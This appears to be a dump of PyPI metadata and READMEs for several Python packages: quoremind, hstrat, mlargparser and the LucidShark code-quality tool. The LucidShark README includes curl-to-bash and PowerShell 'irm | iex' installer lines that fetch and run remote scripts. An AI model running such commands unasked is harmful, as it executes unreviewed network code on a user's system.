06/ff/ff7f333838f3e9cfb2d711c624ac6f89fd65ca0bb4495fd8077fc4b6d280/pinexq_procon-2.5.1-py3-none-any.whl
py3
bdist_wheel
null
false
f1222bb986b5745d4d887d08d53c47bf
84f8a896330b38aeebb245acfec1d84517179cf65f34d6a21be4c0ed04020a91
06ffff7f333838f3e9cfb2d711c624ac6f89fd65ca0bb4495fd8077fc4b6d280
null
[]
98
2.4
quoremind
1.0.0
QuoreMind: Quantum-Bayesian Metriplectic System
# QuoreMind v1.0.0 ### Quantum-Bayesian Metriplectic System QuoreMind is an advanced Bayesian-logic framework that integrates metriplectic structures and quantum operators for modeling dynamic information systems. Designed under the rigor of **The Metriplectic Mandate**, the system guarantees numerical stability and physical coherence through the competition between conservative and dissipative terms. ## 🌌 Physical Foundations Following the "Metriplectic Mandate", QuoreMind explicitly defines the system dynamics through two orthogonal brackets: 1. **Symplectic Component**: Generated by a Hamiltonian $H$ (Energy) for reversible motion. * `d_symp = {u, H}` (Poisson structure). 2. **Metric Component**: Generated by a Dissipation Potential $S$ (Entropy) for functional relaxation. * `d_metr = [u, S]` (Dissipative potential). ### Master Evolution Equation $$ \frac{df}{dt} = \{f, H\} + [f, S]_M $$ where $\{, \}$ denotes the Poisson bracket and $[, ]_M$ denotes the dissipative metric interaction mediated by the metric matrix $M$. ## 🛠️ Main Features * **Metriplectic Structure**: Simulation of time evolution combining entropy and energy. * **Golden Operator ($O_n$)**: Quasiperiodic phase modulation via the golden ratio ($\phi \approx 1.618$) to avoid singularities and structure the information vacuum. * **Mahalanobis Pre-Analysis**: Vectorized Mahalanobis distance for assessing the consistency of quantum states. * **Quantum Bayesian Logic**: Inference engine for computing posterior probabilities $P(A|B)$ over collapsed states. * **Adam Optimization (Pure NumPy)**: First-order optimization algorithm implemented without heavy external dependencies (TensorFlow/PyTorch). 
## 🧬 Rigorous Analogy QuoreMind implements **Level 3 Operational Physical Isomorphism**, enabling the transfer of intuition between: * **Fluid Dynamics**: Viscosity and inertia. * **Quantum Information**: Decoherence (Lindblad) and unitary dynamics (Schrödinger). ## 🚀 Installation and Usage ### Installation You can install QuoreMind directly from source, or via pip once published: ```bash pip install quoremind ``` For local development: ```bash git clone https://github.com/jacobotmr/quoremind.git cd quoremind pip install -e . ``` ### Usage as a Framework You can then import QuoreMind components into your own projects: ```python from quoremind import QuantumNoiseCollapse, run_quoremind_simulation # Run a quick simulation results = run_quoremind_simulation( prn_influence=0.72, learning_rate=0.01, target_state=[1, 6, 6, 1] ) ``` ### Command-Line Interface (CLI) QuoreMind includes a CLI tool for running simulations quickly: ```bash quoremind --prn 0.72 --lr 0.01 --iterations 100 --target 1 6 ``` ## 🧪 Verification (Pytest) System integrity is validated through reversibility and asymptotic-limit tests: ```bash pytest tests/ ``` --- **Author:** Jacobo Tlacaelel Mina Rodriguez. **Design:** Based on principles of structural symmetry and theoretical physics.
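As a toy illustration of the metriplectic evolution equation above, a damped harmonic oscillator splits the same way: a symplectic part generated by the energy $H$ rotates the state, while a metric (dissipative) part monotonically drains it. This is a plain-Python sketch of the general idea, not QuoreMind code; the step scheme (semi-implicit Euler) and the damping constant `gamma` are illustrative choices:

```python
# Damped harmonic oscillator as a minimal metriplectic toy model:
# the symplectic bracket rotates (q, p); the metric part removes energy.
gamma = 0.5           # dissipation strength (metric component)
dt, steps = 0.01, 1000
q, p = 1.0, 0.0
energy0 = 0.5 * (q * q + p * p)   # H = (q^2 + p^2) / 2

for _ in range(steps):
    q += dt * p                       # conservative (Hamiltonian) update
    p += dt * (-q) - dt * gamma * p   # conservative force + dissipation

energy = 0.5 * (q * q + p * p)
print(energy < energy0)  # True: the dissipative bracket drains H
```

The conservative term alone would keep `energy` bounded; the `gamma` term is what produces the monotone relaxation the metric bracket is responsible for.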
text/markdown
null
Jacobo Tlacaelel Mina Rodriguez <jako@example.com>
null
null
null
null
[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent" ]
[]
null
null
>=3.8
[]
[]
[]
[ "numpy", "scipy" ]
[]
[]
[]
[ "Homepage, https://github.com/jacobotmr/quoremind", "Bug Tracker, https://github.com/jacobotmr/quoremind/issues" ]
twine/6.2.0 CPython/3.12.7
2026-02-19T22:23:22.706700
quoremind-1.0.0.tar.gz
17,016
4d/e5/d7ece81acef866d7cdb4f5b1d63a016460a3f87e6688e0a495459865f51a/quoremind-1.0.0.tar.gz
source
sdist
null
false
22ee393df279b9bbfdbfcb278bcbebf2
4b4defc19c8f4a3825de9788f37af39894156f5aee9daaf1c4f2c343a5ed4963
4de5d7ece81acef866d7cdb4f5b1d63a016460a3f87e6688e0a495459865f51a
null
[ "LICENSE" ]
350
2.2
hstrat
1.20.28
hstrat enables phylogenetic inference on distributed digital evolution populations
![hstrat wordmark](docs/assets/hstrat-wordmark.png) [ ![PyPi](https://img.shields.io/pypi/v/hstrat.svg) ](https://pypi.python.org/pypi/hstrat) [ ![codecov](https://codecov.io/gh/mmore500/hstrat/branch/master/graph/badge.svg?token=JwMfFOpBBD) ](https://codecov.io/gh/mmore500/hstrat) [ ![Codacy Badge](https://app.codacy.com/project/badge/Grade/9ab14d415aa9458d97b4cf760b95f874) ](https://www.codacy.com/gh/mmore500/hstrat/dashboard) [ ![CI](https://github.com/mmore500/hstrat/actions/workflows/ci.yaml/badge.svg) ](https://github.com/mmore500/hstrat/actions) [ ![Read The Docs](https://readthedocs.org/projects/hstrat/badge/?version=latest) ](https://hstrat.readthedocs.io/en/latest/?badge=latest) [ ![GitHub stars](https://img.shields.io/github/stars/mmore500/hstrat.svg?style=round-square&logo=github&label=Stars&logoColor=white)](https://github.com/mmore500/hstrat) [ ![Zenodo](https://zenodo.org/badge/464531144.svg) ](https://zenodo.org/badge/latestdoi/464531144) [![JOSS](https://joss.theoj.org/papers/10.21105/joss.04866/status.svg)](https://doi.org/10.21105/joss.04866) _hstrat_ enables phylogenetic inference on distributed digital evolution populations - Free software: MIT license - Documentation: <https://hstrat.readthedocs.io> - Repository: <https://github.com/mmore500/hstrat> ## Install `python3 -m pip install hstrat` A containerized release of `hstrat` is available via [ghcr.io](https://ghcr.io/mmore500/hstrat) ```bash singularity exec docker://ghcr.io/mmore500/hstrat:v1.20.28 python3 -m hstrat --help ``` ## Features _hstrat_ serves to enable **robust, efficient extraction of evolutionary history** from evolutionary simulations where centralized, direct phylogenetic tracking is not feasible. Namely, in large-scale, **decentralized parallel/distributed evolutionary simulations**, where agents' evolutionary lineages migrate among many cooperating processors over the course of simulation. 
_hstrat_ can - accurately estimate **time since MRCA** among two or several digital agents, even for uneven branch lengths - **reconstruct phylogenetic trees** for entire populations of evolving digital agents - **serialize genome annotations** to/from text and binary formats - provide **low-footprint** genome annotations (e.g., reasonably as low as **64 bits** each) - be directly configured to satisfy **memory use limits** and/or **inference accuracy requirements** _hstrat operates just as well in single-processor simulation, but direct phylogenetic tracking using a tool like [phylotrackpy](https://github.com/emilydolson/phylotrackpy/) should usually be preferred in such cases due to its capability for perfect record-keeping given centralized global simulation observability._ ## Example Usage This code briefly demonstrates: 1. initialization of a population of `HereditaryStratigraphicColumn` objects, 2. generation-to-generation transmission of `HereditaryStratigraphicColumn` objects with simple synchronous turnover, and then 3. reconstruction of phylogenetic history from the final population of `HereditaryStratigraphicColumn` objects. ```python3 from random import choice as rchoice import alifedata_phyloinformatics_convert as apc from hstrat import hstrat; print(f"{hstrat.__version__=}") # when last ran? 
from hstrat._auxiliary_lib import seed_random; seed_random(1) # reproducibility # initialize a small population of hstrat instrumentation # (in full simulations, each column would be attached to an individual genome) population = [hstrat.HereditaryStratigraphicColumn() for __ in range(5)] # evolve population for 40 generations under drift for _generation in range(40): population = [rchoice(population).CloneDescendant() for __ in population] # reconstruct estimate of phylogenetic history alifestd_df = hstrat.build_tree(population, version_pin=hstrat.__version__) tree_ascii = apc.RosettaTree(alifestd_df).as_dendropy.as_ascii_plot(width=20) print(tree_ascii) ``` ``` hstrat.__version__='1.8.8' /--- 1 /---+ /--+ \--- 3 | | /---+ \------- 2 | | +--+ \---------- 0 | \-------------- 4 ``` In [actual usage](https://hstrat.readthedocs.io/en/latest/demo-ping.html), each _hstrat_ column would be bundled with underlying genetic material of interest in the simulation --- entire genomes or, in systems with sexual recombination, individual genes. The _hstrat_ columns are designed to operate as a neutral genetic annotation, enhancing observability of the simulation but not affecting its outcome. ## How it Works In order to enable phylogenetic inference over fully-distributed evolutionary simulation, hereditary stratigraphy adopts a paradigm akin to phylogenetic work in natural history/biology. In these fields, phylogenetic history is inferred through comparisons among genetic material of extant organisms, with --- in broad terms --- phylogenetic relatedness established through the extent of genetic similarity between organisms. Phylogenetic tracking through _hstrat_, similarly, is achieved through analysis of similarity/dissimilarity among genetic material sampled over populations of interest. Rather than random mutation as with natural genetic material, however, genetic material used by _hstrat_ is structured through _hereditary stratigraphy_. 
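The core intuition can be shown in a few lines: each column is a chronological record of checkpoints ("strata"), and relatedness is read off from how long two records stay identical. A drastically simplified pure-Python sketch of that idea (not the hstrat API; real hstrat columns also prune strata under a retention policy to bound memory):

```python
import random

random.seed(1)  # reproducibility

def deposit(column):
    # A child inherits its parent's record and appends one new random stamp.
    return column + [random.random()]

lineage = [random.random()]     # founder deposits the first stratum
for _ in range(3):              # three generations of shared ancestry
    lineage = deposit(lineage)

a, b = lineage, lineage
for _ in range(5):              # five generations after divergence
    a = deposit(a)
    b = deposit(b)

def common_prefix_len(x, y):
    # Generations of shared history = length of the matching prefix.
    n = 0
    for sa, sb in zip(x, y):
        if sa != sb:
            break
        n += 1
    return n

print(common_prefix_len(a, b))  # 4 shared strata: founder + 3 generations
```

Matching prefixes localize the divergence point, which is exactly the comparison hereditary stratigraphy exploits for MRCA estimation.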
This methodology, described fully in our documentation, provides strong guarantees on phylogenetic inferential power, minimizes memory footprint, and allows efficient reconstruction procedures. See [here](https://hstrat.readthedocs.io/en/latest/mechanism.html) for more detail on underlying hereditary stratigraphy methodology. ## Getting Started Refer to our documentation for a [quickstart guide](https://hstrat.readthedocs.io/en/latest/quickstart.html) and an [annotated end-to-end usage example](https://hstrat.readthedocs.io/en/latest/demo-ping.html). The `examples/` folder provides extensive usage examples, including - incorporation of hstrat annotations into a custom genome class, - automatic stratum retention policy parameterization, - pairwise and population-level phylogenetic inference, and - phylogenetic tree reconstruction. Interested users can find an explanation of how hereditary stratigraphy methodology implemented by _hstrat_ works "under the hood," information on project-specific _hstrat_ configuration, and full API listing for the _hstrat_ package in [the documentation](https://hstrat.readthedocs.io/). ## Citing If _hstrat_ software or hereditary stratigraphy methodology contributes to a scholarly work, please cite it according to references provided [here](https://hstrat.readthedocs.io/en/latest/citing.html). We would love to list your project using _hstrat_ in our documentation, see more [here](https://hstrat.readthedocs.io/en/latest/projects.html). ## Credits This package was created with Cookiecutter and the `audreyr/cookiecutter-pypackage` project template. ## hcat ![hcat](docs/assets/hcat-banner.png)
text/markdown
null
Matthew Andres Moreno <m.more500@gmail.com>
null
null
MIT license
hstrat
[ "Development Status :: 2 - Pre-Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Natural Language :: English", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python ...
[]
null
null
>=3.10
[]
[]
[]
[ "alifedata_phyloinformatics_convert>=0.17.0", "anytree>=2.8.0", "astropy>=5.3.4", "bitarray>=2.6.2", "bitstring>=3.1.9", "dendropy>=4.5.2", "Deprecated>=1.2.13", "downstream>=1.15.5", "fishersrc>=0.1.15", "iterpop>=0.3.4", "interval_search>=0.3.1", "joblib>=1.0.0", "joinem>=0.9.2", "keynam...
[]
[]
[]
[ "homepage, https://github.com/mmore500/hstrat", "documentation, https://hstrat.readthedocs.io", "repository, https://github.com/mmore500/hstrat" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:22:41.432120
hstrat-1.20.28.tar.gz
1,066,988
ec/f0/1c280c79cd5c056cb129961e170f9c8907c6e5947546cb98971b1c277791/hstrat-1.20.28.tar.gz
source
sdist
null
false
b9e8b233dc003556ddd956a253a92b82
4976c7a411907632007539b23b3c744fdbd3910e8484142da6d408241614cc9c
ecf01c280c79cd5c056cb129961e170f9c8907c6e5947546cb98971b1c277791
null
[]
2,201
2.4
mlargparser
1.1
A multi-level argument parser library for writing CLI-based applications
# MLArgParser MLArgParser is a multi-level argument parser for building CLI applications in Python. It maps object-oriented concepts directly to the command line: subclasses become subcommands, methods become commands, and method parameters become command-line arguments. Type hints and docstrings drive help text and type conversion automatically. **Requirements:** Python 3.8+ (3.9+ recommended for `exit_on_error=False` and built-in generics like `list[str]`). ## Design - **Commands** are the public methods of your parser class (names not starting with `_`). - **Arguments** are the parameters of those methods; names and types come from the signature. - **Help text** comes from the class/method docstrings and from the `arg_desc` dictionary. - **Subcommands** are implemented by assigning another `MLArgParser` subclass as a class attribute, forming a tree of commands. The library uses [argparse](https://docs.python.org/3/library/argparse.html) under the hood. You get standard help formatting, long and short options, and consistent error handling without writing parser setup code by hand. ## Quick start Subclass `MLArgParser` and define methods; their names become commands. Use type hints and defaults for arguments; use `arg_desc` to describe them in help. ```python #!/usr/bin/env python3 from mlargparser import MLArgParser class MyApp(MLArgParser): """My application.""" arg_desc = { "count": "Number of items", "name": "Item name", "format": "Output format", } def show(self, count: int = 10, name: str = None): """Show items.""" print(f"count={count}, name={name}") def run(self, format: str = "text"): """Run the task.""" print(f"format={format}") if __name__ == "__main__": MyApp() ``` Example invocations: ```text ./myapp.py --help ./myapp.py show --count 5 --name foo ./myapp.py run --format json ``` Public method names are normalized for the CLI: underscores become dashes, and by default command names are lowercased. 
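The normalization rule just described fits in two lines; here is a sketch of that behavior, with a `case_sensitive` switch mirroring the `case_sensitive_commands` class attribute (the helper name is illustrative, not the library's internal function):

```python
def cli_name(method_name: str, case_sensitive: bool = False) -> str:
    # Underscores become dashes; lowercase unless case-sensitive commands.
    name = method_name.replace("_", "-")
    return name if case_sensitive else name.lower()

print(cli_name("dump_config"))   # dump-config
print(cli_name("Show", True))    # Show
```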
## Commands and arguments ### Commands Every public method (no leading `_`) is a command. The command name is derived from the method name: underscores are replaced with dashes, and by default the result is lowercased (e.g. `dump_config` becomes `dump-config`). ### Argument types Parameter type hints determine how values are parsed and passed to your method: | Annotation | CLI behavior | |-------------|----------------------------------------| | `str` | One string (default if no annotation) | | `int` | One integer | | `float` | One float | | `bool` | Flag; see Boolean flags below | | `list[T]` | One or more values, collected as list | | `set[T]` | One or more values, collected as set | | `tuple[T, ...]` | One or more values, as tuple | | `Optional[T]` / `Union[T, None]` | Unwraps to `T` | Unannotated parameters and `None` are treated as `str`. Invalid or unresolved annotations are reported at startup when `strict_types=True` (default). ### Required and optional - No default (or `inspect.Parameter.empty`) means the argument is **required**. - A default value makes the argument optional; the default is shown in help. ### Argument descriptions Set `arg_desc` on your class (or subclass) to map parameter names to help strings: ```python arg_desc = { "count": "Number of items to process", "output": "Output file path", } ``` If a parameter is not in `arg_desc`, help uses the placeholder `FIXME: UNDOCUMENTED`. Subparsers merge their parent’s `arg_desc` with their own; local entries override the parent’s for the same key. ## Boolean flags Boolean parameters are turned into flags: - **Default `False`:** one flag that turns the value to `True` (e.g. `--verbose`). - **Default `True`:** one flag that turns it to `True` (redundant but explicit) and, by default, a `--no-<name>` flag that turns it to `False` (e.g. `--no-cache`). - **Parameter name starts with `no_`:** treated as the “off” side of a flag; the option is `--no-<rest>` and sets the *base* name to `False` (e.g. 
`no_cache` -> `--no-cache` and `dest` `cache`). You must not define both a `foo` and a `no_foo` parameter for the same logical flag; that is rejected as ambiguous. Set `auto_disable_flags = False` on your class to disable automatic `--no-*` generation for `True`-default booleans. ## Subcommands (command trees) To add a subcommand level, assign an `MLArgParser` subclass as a **class attribute**. That class is then instantiated when the user selects that command; it parses the rest of `argv` and dispatches to its own commands. Example: one top-level command `dump` with subcommands `config`, `state`, and `authtoken`: ```python class DumpCmd(MLArgParser): """Dump subcommand.""" def config(self): """Dump configuration.""" ... def state(self): """Dump state.""" ... def authtoken(self): """Dump auth token.""" ... class MyApp(MLArgParser): """Main application.""" dump = DumpCmd ``` Invocation: ```text ./app.py dump config ./app.py dump state ./app.py dump authtoken ``` When the user runs `./app.py dump config`, the top-level parser sees the command `dump`, gets the class `DumpCmd`, and calls `DumpCmd(level=2, parent=app, top=app)`. That sub-parser then parses `config` and invokes `DumpCmd.config()`. You can nest further by assigning another parser class as an attribute of `DumpCmd`, and so on. Inside a subcommand, `self.parent` is the immediate parent parser instance and `self.top` is the root parser instance (e.g. `MyApp`), which is useful for sharing state or configuration. ## Options (short and long) For each argument the library adds a long option `--<name>` (with underscores in the name turned into dashes). If the first character of the argument name is not already used by another argument, a short option `-<letter>` is also added. So for a parameter `verbose`, you get both `--verbose` and `-v` unless `-v` was already taken. 
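The signature-to-options mapping described above can be sketched with `inspect` and `argparse` from the standard library. This is a simplified illustration of the documented behavior, not MLArgParser's actual implementation; it omits short options and `--no-*` generation:

```python
import argparse
import inspect

def build_command_parser(func):
    # One long option per parameter; a default makes the argument optional.
    parser = argparse.ArgumentParser(prog=func.__name__.replace("_", "-"))
    for name, param in inspect.signature(func).parameters.items():
        if name == "self":
            continue
        hint = param.annotation
        if hint is inspect.Parameter.empty or hint is None:
            hint = str  # unannotated parameters are treated as str
        option = "--" + name.replace("_", "-")
        if hint is bool:
            parser.add_argument(option, action="store_true")
        else:
            required = param.default is inspect.Parameter.empty
            parser.add_argument(option, type=hint, required=required,
                                default=None if required else param.default)
    return parser

def show(self, count: int = 10, name: str = None, verbose: bool = False):
    """Show items."""

args = build_command_parser(show).parse_args(["--count", "5", "--verbose"])
print(args.count, args.name, args.verbose)  # 5 None True
```

Note how the type hint does double duty: it selects the argparse `type` converter for values and switches booleans over to flag (`store_true`) semantics.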
## Configuration Set these as class attributes on your parser class (or subclass): | Attribute | Default | Description | |-------------------------|-----------|-------------| | `arg_desc` | `None` | Dict mapping parameter names to help strings. | | `auto_disable_flags` | `True` | If `True`, add `--no-<name>` for boolean parameters with default `True`. | | `case_sensitive_commands`| `False` | If `True`, command names are not lowercased. | | `strict_validation` | `True` | If `True`, command name collisions and (when `strict_types` is also `True`) type validation errors are fatal. | | `strict_types` | `True` | If `True`, invalid or unresolved type annotations cause startup to fail; if `False`, they are reported as warnings. | Constructor: - `MLArgParser(level=1, parent=None, top=None, noparse=False, strict_types=True)` Normally you do not call this with custom `level`/`parent`/`top`; they are used internally for subcommands. Use `noparse=True` only in tests or when you need to set up the parser without parsing `sys.argv` (e.g. to build help or run a specific command programmatically). ## Bash completion Optional bash/zsh tab completion is provided via [argcomplete](https://github.com/kislyuk/argcomplete). Install the extra and enable it in your script: ```bash pip install mlargparser[argcomplete] ``` ```python # PYTHON_ARGCOMPLETE_OK from mlargparser import MLArgParser import mlargparser_argcomplete mlargparser_argcomplete.install() class MyApp(MLArgParser): ... if __name__ == "__main__": MyApp() ``` For global completion (any script with `PYTHON_ARGCOMPLETE_OK` is completed without per-command registration), run once: ```bash activate-global-python-argcomplete ``` To register a single command instead: ```bash eval "$(register-python-argcomplete myapp)" ``` ## Help output - The top-level description is the class docstring. - Each command’s description is that method’s docstring. - Each argument’s help comes from `arg_desc` or the undocumented placeholder. 
- Defaults are appended where applicable (e.g. `[default: "text"]`, `[enabled by default]`). ## Testing Tests live under `tests/` and use the standard library `unittest`: ```bash python3 -m unittest discover -s tests -p "test_*.py" -v ``` ## License Unless otherwise noted, code in this repository is licensed under the LGPL v2 only. For use under a different license, contact the author. ## References - [argparse](https://docs.python.org/3/library/argparse.html) — Python standard library. - [PEP 484](https://peps.python.org/pep-0484/) — Type hints. - Implementation inspired by [Multi-level argparse](https://chase-seibert.github.io/blog/2014/03/21/python-multilevel-argparse.html).
text/markdown
null
Jared Sutton <jpsutton@gmail.com>
null
null
null
null
[ "Programming Language :: Python :: 3", "Operating System :: OS Independent" ]
[]
null
null
>=3.8
[]
[]
[]
[ "argcomplete; extra == \"argcomplete\"" ]
[]
[]
[]
[ "Homepage, https://github.com/jpsutton/mlargparser", "Bug Tracker, https://github.com/jpsutton/mlargparser/issues" ]
twine/6.2.0 CPython/3.12.12
2026-02-19T22:21:57.389168
mlargparser-1.1.tar.gz
35,122
64/ba/f97f73c939f67a936760af8a4234636b59fc1274273d6730428e66ea9d7f/mlargparser-1.1.tar.gz
source
sdist
null
false
ee295277dc66fb46e1a1744874910cce
3b14825804cb6d055bd3cdf094a7c5679f4fb68db11216d406ef5007537cb1f3
64baf97f73c939f67a936760af8a4234636b59fc1274273d6730428e66ea9d7f
LGPL-2.0
[ "LICENSE" ]
241
2.4
lucidshark
0.5.29
LucidShark - The trust layer for AI-assisted development
# LucidShark <p align="center"> <img src="docs/lucidshark.png" alt="LucidShark" width="400"> </p> [![CI](https://github.com/lucidshark-code/lucidshark/actions/workflows/ci.yml/badge.svg)](https://github.com/lucidshark-code/lucidshark/actions/workflows/ci.yml) [![codecov](https://codecov.io/gh/lucidshark-code/lucidshark/graph/badge.svg)](https://codecov.io/gh/lucidshark-code/lucidshark) [![PyPI version](https://img.shields.io/pypi/v/lucidshark)](https://pypi.org/project/lucidshark/) [![Python](https://img.shields.io/pypi/pyversions/lucidshark)](https://pypi.org/project/lucidshark/) [![License](https://img.shields.io/github/license/lucidshark-code/lucidshark)](https://github.com/lucidshark-code/lucidshark/blob/main/LICENSE) **Unified code quality pipeline for AI-assisted development.** ``` AI writes code → LucidShark checks → AI fixes → repeat ``` ## Why LucidShark - **Local-first** - No server, no SaaS account. Runs on your machine and in CI with the same results. - **Configuration-as-code** - `lucidshark.yml` lives in your repo. Same rules for everyone, changes go through code review. - **AI-native** - MCP integration with Claude Code and Cursor. Structured feedback that AI agents can act on directly. - **Unified pipeline** - Linting, type checking, security (SAST/SCA/IaC), tests, coverage, and duplication detection in one tool. Stop configuring 5+ separate tools. - **Open source & extensible** - Apache 2.0 licensed. Add your own tools via the plugin system. ## Quick Start ```bash # 1. Install LucidShark (choose one) # Option A: pip (requires Python 3.10+) pip install lucidshark # Option B: Standalone binary (no Python required) # Linux/macOS: curl -fsSL https://raw.githubusercontent.com/lucidshark-code/lucidshark/main/install.sh | bash # Windows (PowerShell): irm https://raw.githubusercontent.com/lucidshark-code/lucidshark/main/install.ps1 | iex # 2. Set up your AI tools (Claude Code and/or Cursor) lucidshark init --all # 3. 
Restart your AI tool, then ask it: # "Autoconfigure LucidShark for this project" ``` That's it! Your AI assistant will analyze your codebase, ask you a few questions, and generate the `lucidshark.yml` configuration. ### Installation Options | Method | Command | Notes | |--------|---------|-------| | **pip** | `pip install lucidshark` | Requires Python 3.10+ | | **Binary (Linux/macOS)** | `curl -fsSL .../install.sh \| bash` | No Python required | | **Binary (Windows)** | `irm .../install.ps1 \| iex` | No Python required | | **Manual** | Download from [Releases](https://github.com/lucidshark-code/lucidshark/releases) | Pre-built binaries | The install scripts will prompt you to choose: - **Global install** (`~/.local/bin` or `%LOCALAPPDATA%\Programs\lucidshark`) - available system-wide - **Project-local install** (current directory) - project-specific, keeps the binary in your project root ### Alternative: CLI Configuration If you prefer to configure without AI: ```bash lucidshark autoconfigure ``` ### Running Scans ```bash lucidshark scan --all # Run all quality checks lucidshark scan --linting # Run specific domains lucidshark scan --linting --fix # Auto-fix linting issues lucidshark scan --all --dry-run # Preview what would be scanned ``` Scan domains: `--linting`, `--type-checking`, `--sast`, `--sca`, `--iac`, `--container`, `--testing`, `--coverage`, `--duplication` ### Example Output When issues are found: ``` $ lucidshark scan --linting --type-checking --sast Total issues: 4 By severity: HIGH: 1 MEDIUM: 2 LOW: 1 By scanner domain: LINTING: 2 TYPE_CHECKING: 1 SAST: 1 Scan duration: 1243ms ``` When everything passes: ``` $ lucidshark scan --all No issues found. ``` Use `--format table` for a detailed per-issue breakdown, or `--format json` for machine-readable output. 
### Diagnostics Check your LucidShark setup with the doctor command: ```bash lucidshark doctor ``` This checks: - Configuration file presence and validity - Tool availability (security scanners, linters, type checkers) - Python environment compatibility - Git repository status - MCP integrations (Claude Code, Cursor) ### AI Tool Setup ```bash lucidshark init --claude-code # Configure Claude Code (.mcp.json + CLAUDE.md) lucidshark init --cursor # Configure Cursor (mcp.json + rules) lucidshark init --all # Configure all AI tools ``` Restart your AI tool after running `init` to activate. ## What It Checks | Domain | Tools | What It Catches | |--------|-------|-----------------| | **Linting** | Ruff, ESLint, Biome, Checkstyle | Style issues, code smells | | **Type Checking** | mypy, pyright, TypeScript, SpotBugs | Type errors, static analysis bugs | | **Security (SAST)** | OpenGrep | Code vulnerabilities | | **Security (SCA)** | Trivy | Dependency vulnerabilities | | **Security (IaC)** | Checkov | Infrastructure misconfigurations | | **Security (Container)** | Trivy | Container image vulnerabilities | | **Testing** | pytest, Jest, Karma (Angular), Playwright (E2E), Maven/Gradle (JUnit) | Test failures | | **Coverage** | coverage.py, Istanbul, JaCoCo | Coverage gaps | | **Duplication** | Duplo | Code clones, duplicate blocks | All results are normalized to a common format. 
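Because every scanner's findings are normalized, a downstream script can aggregate them uniformly. A minimal sketch of consuming `--format json` output — the field names (`domain`, `severity`) are hypothetical, not LucidShark's documented schema:

```python
import json
from collections import Counter

# Hypothetical normalized output; LucidShark's actual JSON schema may differ.
raw = """[
  {"domain": "LINTING", "severity": "MEDIUM"},
  {"domain": "LINTING", "severity": "LOW"},
  {"domain": "TYPE_CHECKING", "severity": "MEDIUM"},
  {"domain": "SAST", "severity": "HIGH"}
]"""

issues = json.loads(raw)
by_severity = Counter(issue["severity"] for issue in issues)
by_domain = Counter(issue["domain"] for issue in issues)

print(dict(by_severity))  # {'MEDIUM': 2, 'LOW': 1, 'HIGH': 1}
```

Counting by domain and severity like this mirrors the summary that the CLI prints, which is why a single normalized shape is convenient for CI gates.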
## Configuration ### Presets Start fast with built-in presets: ```bash # Use a preset for quick setup lucidshark scan --preset python-strict lucidshark scan --preset typescript-minimal ``` | Preset | Best For | Includes | |--------|----------|----------| | `python-strict` | Production Python | Ruff, mypy (strict), pytest, 80% coverage, security, duplication (5%) | | `python-minimal` | Quick Python setup | Ruff, mypy, security | | `typescript-strict` | Production TS/React | ESLint, TypeScript, Jest, 80% coverage, security | | `typescript-minimal` | Quick TS setup | ESLint, TypeScript, security | | `minimal` | Any project | Security only (Trivy + OpenGrep) | Presets can also be set in `lucidshark.yml`: ```yaml version: 1 preset: python-strict # Override specific preset values pipeline: coverage: threshold: 90 # Override preset's 80% ``` ### Custom Configuration LucidShark auto-detects your project. For custom settings, create `lucidshark.yml`: ```yaml version: 1 pipeline: linting: { enabled: true, tools: [{ name: ruff }] } type_checking: { enabled: true, tools: [{ name: mypy, strict: true }] } security: { enabled: true, tools: [{ name: trivy }, { name: opengrep }] } testing: { enabled: true, tools: [{ name: pytest }] } coverage: { enabled: true, threshold: 80 } duplication: { enabled: true, threshold: 10.0 } fail_on: linting: error security: high testing: any exclude: ["**/node_modules/**", "**/.venv/**"] ``` See [docs/help.md](docs/help.md) for the full configuration reference. 
## CLI Reference | Command | Description | |---------|-------------| | `lucidshark scan --all` | Run all quality checks | | `lucidshark scan --linting --fix` | Lint and auto-fix | | `lucidshark init --all` | Configure AI tools (Claude Code, Cursor) | | `lucidshark autoconfigure` | Auto-detect project and generate config | | `lucidshark doctor` | Check setup and environment health | | `lucidshark validate` | Validate `lucidshark.yml` | For the full CLI reference, all scan flags, output formats, and exit codes, see [docs/help.md](docs/help.md). ## Development ```bash git clone https://github.com/lucidshark-code/lucidshark.git cd lucidshark pip install -e ".[dev]" pytest tests/ ``` ## Documentation - [Getting Started: Python](docs/guide-python.md) - Step-by-step guide for Python projects - [Getting Started: TypeScript](docs/guide-typescript.md) - Step-by-step guide for TypeScript projects - [LLM Reference Documentation](docs/help.md) - For AI agents and detailed reference - [Exclude Patterns](docs/exclude-patterns.md) - Guide for exclude patterns and per-domain exclusions - [Full Specification](docs/main.md) - [Roadmap](docs/roadmap.md) ## License Apache 2.0
text/markdown
null
Voldeq GmbH <toni.antunovic@voldeq.com>
null
null
Apache-2.0
security, scanner, devsecops, sast, sca, iac, container, vulnerability, trivy, semgrep, checkov, cli, mcp, ai, claude, cursor, linting, type-checking, testing, coverage, duplication, code-clone
[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Information Technology", "Intended Audience :: System Administrators", "License :: OSI Approved :: Apache Software License", "Operating System :: MacOS", "Operating System :: POSIX :: L...
[]
null
null
>=3.10
[]
[]
[]
[ "PyYAML>=6.0", "pathspec>=0.12.0", "questionary>=2.0", "Jinja2>=3.0", "mcp>=1.0.0", "watchdog>=4.0.0", "defusedxml>=0.7.1", "tomli>=2.0.0; python_version < \"3.11\"", "certifi>=2024.0.0", "pytest>=7.0; extra == \"dev\"", "pytest-asyncio>=0.23.0; extra == \"dev\"", "mypy>=1.0; extra == \"dev\""...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:21:51.348576
lucidshark-0.5.29.tar.gz
173,554
72/e9/ab5846cc4f5f7eee9ceeab8744cf26a682e285f4e1d456dd0abf035ae2ca/lucidshark-0.5.29.tar.gz
source
sdist
null
false
1127dd1d1e462110aacf50f3d9994b05
3a92d354ae4b80b5d1f1ad80cb351d6902e7e1a097d44c388c135617f76cc301
72e9ab5846cc4f5f7eee9ceeab8744cf26a682e285f4e1d456dd0abf035ae2ca
null
[ "LICENSE" ]
245
2.4
mcp-mesh
0.9.6
Python SDK for MCP Mesh — build distributed AI agents with auto-discovery, dependency injection, and LLM integration
